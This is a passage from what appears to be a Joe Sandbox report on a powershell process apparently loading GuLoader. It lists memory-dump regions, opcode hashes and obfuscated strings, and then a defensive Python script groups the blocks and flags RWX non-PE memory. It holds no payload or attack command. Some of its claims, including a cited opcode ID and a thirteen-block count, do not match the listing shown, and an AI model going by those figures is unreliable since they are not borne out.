                                    • API String ID: 0-3877811654
                                    • Opcode ID: d2b3e2a153d37f27a88b2fd358ae25813d5547bc55bfca25352ca8d756fbd88b
                                    • Instruction ID: 2cf28865658e1c099b51475af1783ccbd6ce0982d023321d76c25ead9f391cdf
                                    • Opcode Fuzzy Hash: d2b3e2a153d37f27a88b2fd358ae25813d5547bc55bfca25352ca8d756fbd88b
                                    • Instruction Fuzzy Hash: 8831AB34F003109FDBA4DF58C854BAAFBA2EF98754B258185E805AB381C732ED02CBD1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$tP;r$tP;r
                                    • API String ID: 0-3204662951
                                    • Opcode ID: bcd2b91caa6fe625fc4980a5fcddc793beb1cbc05e119840e44c5a14d2f53103
                                    • Instruction ID: 82938ec3cc5608899699bef97e11d5ffccb2001c6ff95172f4a34d82c0d2ed9d
                                    • Opcode Fuzzy Hash: bcd2b91caa6fe625fc4980a5fcddc793beb1cbc05e119840e44c5a14d2f53103
                                    • Instruction Fuzzy Hash: C9815C31F003419FDFA45B69D8147BBB7A6AFC5314F2494AAE545CB281DA32CC47C7A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$4';r$4';r
                                    • API String ID: 0-229571521
                                    • Opcode ID: a7b53274b440d209269146176a13fcece69aadf06967ca7c8f74abfa08241cad
                                    • Instruction ID: b35c41e78b0bc9d8d9517b729678cd79b06a556c5353f083700693c86a602841
                                    • Opcode Fuzzy Hash: a7b53274b440d209269146176a13fcece69aadf06967ca7c8f74abfa08241cad
                                    • Instruction Fuzzy Hash: 8B714935F00345DFDB949E6885017BAB7A99FC4A94F34917AD406DB241EB32C943C7E2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (?r$H?r$H?r$P
                                    • API String ID: 0-3463578099
                                    • Opcode ID: 24b5489a0d6762d8c2fea4a7a4cae9513c35e809a384e5f146861417965234bb
                                    • Instruction ID: 9fb7e60957620fd893cd5553d306250ddacca09e1c677b25ade1eb0a74161833
                                    • Opcode Fuzzy Hash: 24b5489a0d6762d8c2fea4a7a4cae9513c35e809a384e5f146861417965234bb
                                    • Instruction Fuzzy Hash: C14112327052141BEB55AA79A9243BF6BDBEFC4351B1485B8E80ACB381DF35DC0283D2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: XR@r$XR@r$tP;r$$;r
                                    • API String ID: 0-2885941037
                                    • Opcode ID: e11d6ff1772f9891cc41aafa5aa0ed5be5eda74941099a3c145a82c35c63b3f8
                                    • Instruction ID: 9600f6973315e37fdbaf5b47cc88e85f698e2f447c691a4c0e55a73f46e42f06
                                    • Opcode Fuzzy Hash: e11d6ff1772f9891cc41aafa5aa0ed5be5eda74941099a3c145a82c35c63b3f8
                                    • Instruction Fuzzy Hash: F0419431E00305DFDBA4CF19D544BAAB7E2AF88359F28D0A9D416AF251D732DD86CB90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $;r$$;r$$;r$$;r
                                    • API String ID: 0-2421127452
                                    • Opcode ID: 7d317d3d8c689e156df2722884a75fa2ae1a0c8cfebbcd4a18fa242d8874979c
                                    • Instruction ID: 3546273adf5c10903312265ea34a111ec3fd98dd0172aa7f6aae02e9a92c4e2a
                                    • Opcode Fuzzy Hash: 7d317d3d8c689e156df2722884a75fa2ae1a0c8cfebbcd4a18fa242d8874979c
                                    • Instruction Fuzzy Hash: FB217D31B003469FEBB8597A5C04B7BB6869FC0619F20943ADB05CB381DD76CA43C361
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $;r$$;r$$;r$$;r
                                    • API String ID: 0-2421127452
                                    • Opcode ID: 4e495a9706f9bb32efa54aa9c69325123d619a18fe518929258f305d3a5030ef
                                    • Instruction ID: c217995d0702e7f81afbf1a2b4cb621dfd688b9528cbaef4f9e1137c344c4388
                                    • Opcode Fuzzy Hash: 4e495a9706f9bb32efa54aa9c69325123d619a18fe518929258f305d3a5030ef
                                    • Instruction Fuzzy Hash: 7411D639E04305DFDFF49E598E406B6B7A4BF40B19F14617AC80897643D736C546C792
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$$;r$$;r
                                    • API String ID: 0-1880743479
                                    • Opcode ID: 4e24e7250d3cdefd360d60485494430cd18acf8447af0f7c2049e14217091984
                                    • Instruction ID: e1af4260b72bf9ee0ec20a1cccb33fdd47ff757ef0334f900208471155a45132
                                    • Opcode Fuzzy Hash: 4e24e7250d3cdefd360d60485494430cd18acf8447af0f7c2049e14217091984
                                    • Instruction Fuzzy Hash: 3F01A22170D3D14FD7AB16281824AA56BB64FC3640B2D41D7D482CF793CD198D0783A7
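The entries above are only useful once they are grouped: almost every lifted opcode block comes from the same non-PE-backed region at 06ED0000 inside the powershell process (the `hcaresult_7_2_6ed0000_powershell` snapshot), which is where the unpacked GuLoader code would be expected to sit, with a single block from 00B50000. The script below is an added example, not Joe Sandbox code, that parses this listing format and tallies blocks per memory region, flagging regions that are executable-writable and not image-backed. The `.sdmp` field layout (process index, stage, dump id, base address, page protection) and the snapshot-name-to-image mapping are assumptions inferred from the listing, labelled as such in the code; the embedded input is a constructed excerpt copied from the entries above.

```python
"""Group Joe Sandbox 'Memory Dump Source' / similarity entries by memory region
to see where the lifted opcode blocks came from (added example, not Joe Sandbox code)."""
import re
from collections import defaultdict
from dataclasses import dataclass

PAGE_EXECUTE_READWRITE = 0x40  # Win32 memory protection constant

# ASSUMPTION (inferred from the listing, not documented on the page):
# <process-index>.<stage>.<dump-id>.<base-address>.<protection>.<3 fields>.sdmp
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?:[0-9A-Fa-f]{8}\.){3}sdmp$")
# ASSUMPTION: the snapshot name ends with the image name of the dumped process.
SNAPSHOT_RE = re.compile(r"^hcaresult_\d+_\d+_[0-9a-f]+_(?P<image>.+)\.jbxd$")
FIELD_RE = re.compile(r"^•?\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")

# Constructed excerpt: three entries copied from the listing above, trimmed to the
# fields this script uses (other bullet lines are parsed but ignored).
SAMPLE = """\
Strings
Memory Dump Source
• Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
• Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
• Opcode ID: 90d52f6754b4f7aa8c71f9e7bd89da2ff236ce2d20c0f56465c2de8158035685
• Instruction Fuzzy Hash: C6813B31F043519FD7A45AAEC8057BBBBA6AFC5214F14807AD506CB281DB72CA43C7E2
Strings
Memory Dump Source
• Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
• Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
• Opcode ID: 24b5489a0d6762d8c2fea4a7a4cae9513c35e809a384e5f146861417965234bb
• Instruction Fuzzy Hash: C14112327052141BEB55AA79A9243BF6BDBEFC4351B1485B8E80ACB381DF35DC0283D2
Strings
Memory Dump Source
• Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
• Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
• Opcode ID: 7d317d3d8c689e156df2722884a75fa2ae1a0c8cfebbcd4a18fa242d8874979c
• Instruction Fuzzy Hash: FB217D31B003469FEBB8597A5C04B7BB6869FC0619F20943ADB05CB381DD76CA43C361
"""


@dataclass
class Block:
    proc: int          # process index within the analysis (assumed field)
    base: int          # region base address, cross-checked against "Offset:"
    protect: int       # page protection of the dumped region (assumed field)
    pe_backed: bool    # "based on PE" flag from the report
    image: str         # process image name taken from the snapshot file name
    opcode_id: str
    insn_fuzzy: str


def _finish(fields):
    """Build a Block from one entry's key/value lines."""
    src, *rest = [p.strip() for p in fields["Source File"].split(",")]
    meta = dict(p.split(": ", 1) for p in rest if ": " in p)
    m = SDMP_RE.match(src)
    if not m:
        raise ValueError(f"unexpected dump name: {src}")
    base = int(m["base"], 16)
    if "Offset" in meta and int(meta["Offset"], 16) != base:
        raise ValueError(f"offset {meta['Offset']} disagrees with dump name {src}")
    snap = SNAPSHOT_RE.match(fields.get("Snapshot File", ""))
    return Block(proc=int(m["proc"], 16), base=base, protect=int(m["protect"], 16),
                 pe_backed=meta.get("based on PE", "").lower() == "true",
                 image=snap["image"] if snap else "?",
                 opcode_id=fields.get("Opcode ID", ""),
                 insn_fuzzy=fields.get("Instruction Fuzzy Hash", ""))


def parse_blocks(text):
    """Each entry starts at a 'Memory Dump Source' line; collect its bullet fields."""
    blocks, cur = [], {}
    for line in text.splitlines():
        line = line.strip()
        if line == "Memory Dump Source":
            if "Source File" in cur:
                blocks.append(_finish(cur))
            cur = {}
            continue
        m = FIELD_RE.match(line)
        if m:
            cur[m["key"]] = m["val"]
    if "Source File" in cur:
        blocks.append(_finish(cur))
    return blocks


def summarize(blocks):
    """Tally blocks per (process, region); mark RWX regions that are not PE-backed,
    since unpacked or injected code normally lives in exactly such memory."""
    regions = defaultdict(list)
    for b in blocks:
        regions[(b.proc, b.base)].append(b)
    out = {}
    for key, bs in sorted(regions.items()):
        first = bs[0]
        out[key] = {"image": first.image, "blocks": len(bs),
                    "distinct_fuzzy": len({b.insn_fuzzy for b in bs}),
                    "protect": first.protect, "pe_backed": first.pe_backed,
                    "suspicious": first.protect == PAGE_EXECUTE_READWRITE and not first.pe_backed}
    return out


if __name__ == "__main__":
    for (proc, base), info in summarize(parse_blocks(SAMPLE)).items():
        print(f"proc {proc} {info['image']} @ {base:08X}: {info['blocks']} blocks, "
              f"protect 0x{info['protect']:02X}, PE-backed={info['pe_backed']}, "
              f"suspicious={info['suspicious']}")
```

Feeding the whole listing above to `parse_blocks` instead of the excerpt gives thirteen blocks for the 06ED0000 region and one for 00B50000, all from the same powershell process; the region-level view is what an analyst carves and scans for the GuLoader shellcode, rather than the individual opcode entries.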